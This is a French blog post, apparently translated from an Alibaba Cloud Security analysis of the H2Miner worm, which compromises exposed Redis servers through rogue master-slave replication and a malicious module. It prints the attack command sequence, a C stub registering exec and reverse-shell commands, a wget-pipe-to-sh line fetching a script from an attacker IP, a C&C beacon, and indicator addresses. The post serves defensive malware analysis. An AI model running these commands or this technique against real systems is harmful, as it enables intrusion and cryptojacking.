Il y a un jour, l’un des serveurs de mon projet a été attaqué par un ver similaire. À la recherche d’une réponse à la question « qu’est-ce que c’était ? » J'ai trouvé un excellent article de l'équipe Alibaba Cloud Security. N’ayant pas trouvé cet article sur Habré, j’ai décidé de le traduire spécialement pour vous <3
Entrée
Récemment, l'équipe de sécurité d'Alibaba Cloud a découvert une épidémie soudaine de H2Miner. Ce type de ver malveillant utilise l'absence d'autorisation ou des mots de passe faibles pour Redis comme passerelles vers vos systèmes, après quoi il synchronise son propre module malveillant avec l'esclave via une synchronisation maître-esclave et télécharge enfin ce module malveillant sur la machine attaquée et exécute le programme malveillant. instructions.
Dans le passé, les attaques contre vos systèmes étaient principalement menées à l'aide d'une méthode impliquant des tâches planifiées ou des clés SSH écrites sur votre machine après que l'attaquant se soit connecté à Redis. Heureusement, cette méthode ne peut pas être utilisée souvent en raison de problèmes de contrôle des autorisations ou de différentes versions du système. Cependant, cette méthode de chargement d'un module malveillant peut exécuter directement les commandes de l'attaquant ou accéder au shell, ce qui est dangereux pour votre système.
En raison du grand nombre de serveurs Redis hébergés sur Internet (près d'un million), l'équipe de sécurité d'Alibaba Cloud, pour rappel amical, recommande aux utilisateurs de ne pas partager Redis en ligne et de vérifier régulièrement la force de leurs mots de passe et s'ils sont compromis. sélection rapide.
H2Mineur
H2Miner est un botnet minier pour les systèmes basés sur Linux qui peut envahir votre système de diverses manières, notamment par manque d'autorisation dans les vulnérabilités Hadoop Yarn, Docker et Redis d'exécution de commandes à distance (RCE). Un botnet fonctionne en téléchargeant des scripts malveillants et des logiciels malveillants pour exploiter vos données, étendre l'attaque horizontalement et maintenir les communications de commande et de contrôle (C&C).
Redis RCE
Les connaissances sur ce sujet ont été partagées par Pavel Toporkov lors de ZeroNights 2018. Après la version 4.0, Redis prend en charge une fonctionnalité de chargement de plug-in qui donne aux utilisateurs la possibilité de charger des fichiers compilés avec C dans Redis pour exécuter des commandes Redis spécifiques. Cette fonction, bien qu'utile, contient une vulnérabilité dans laquelle, en mode maître-esclave, les fichiers peuvent être synchronisés avec l'esclave via le mode fullresync. Cela peut être utilisé par un attaquant pour transférer des fichiers malveillants. Une fois le transfert terminé, les attaquants chargent le module sur l'instance Redis attaquée et exécutent n'importe quelle commande.
Analyse des vers malveillants
Récemment, l’équipe de sécurité d’Alibaba Cloud a découvert que la taille du groupe de mineurs malveillants H2Miner avait soudainement augmenté de façon spectaculaire. Selon l’analyse, le processus général d’apparition d’une attaque est le suivant :
H2Miner utilise RCE Redis pour une attaque à part entière. Les attaquants attaquent d’abord les serveurs Redis non protégés ou les serveurs dotés de mots de passe faibles.
Ensuite, ils utilisent la commande config set dbfilename red2.so pour changer le nom du fichier. Après cela, les attaquants exécutent la commande slaveof pour définir l'adresse de l'hôte de réplication maître-esclave.
Lorsque l'instance Redis attaquée établit une connexion maître-esclave avec le Redis malveillant appartenant à l'attaquant, celui-ci envoie le module infecté à l'aide de la commande fullresync pour synchroniser les fichiers. Le fichier red2.so sera ensuite téléchargé sur la machine attaquée. Les attaquants utilisent ensuite le module de chargement ./red2.so pour charger ce fichier so. Le module peut exécuter des commandes d'un attaquant ou initier une connexion inversée (porte dérobée) pour accéder à la machine attaquée.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Après avoir exécuté une commande malveillante telle que / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, l'attaquant réinitialisera le nom du fichier de sauvegarde et déchargera le module système pour nettoyer les traces. Cependant, le fichier red2.so restera toujours sur la machine attaquée. Il est conseillé aux utilisateurs de faire attention à la présence d'un tel fichier suspect dans le dossier de leur instance Redis.
En plus de tuer certains processus malveillants pour voler des ressources, l'attaquant a suivi un script malveillant en téléchargeant et en exécutant des fichiers binaires malveillants sur . Cela signifie que le nom du processus ou le nom du répertoire contenant le kinsing sur l'hôte peut indiquer que cette machine a été infectée par ce virus.
D’après les résultats de l’ingénierie inverse, le malware remplit principalement les fonctions suivantes :
- Télécharger des fichiers et les exécuter
- exploitation minière
- Maintenir la communication C&C et exécuter les commandes des attaquants
Utilisez masscan pour une analyse externe afin d’étendre votre influence. De plus, l'adresse IP du serveur C&C est codée en dur dans le programme, et l'hôte attaqué communiquera avec le serveur de communication C&C à l'aide de requêtes HTTP, où les informations zombie (serveur compromis) sont identifiées dans l'en-tête HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Autres méthodes d'attaque
Adresses et liens utilisés par le ver
/parenté
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Conseil
Premièrement, Redis ne doit pas être accessible depuis Internet et doit être protégé par un mot de passe fort. Il est également important que les clients vérifient qu'il n'y a pas de fichier red2.so dans le répertoire Redis et qu'il n'y a pas de « parenté » dans le nom du fichier/processus sur l'hôte.
Source: habr.com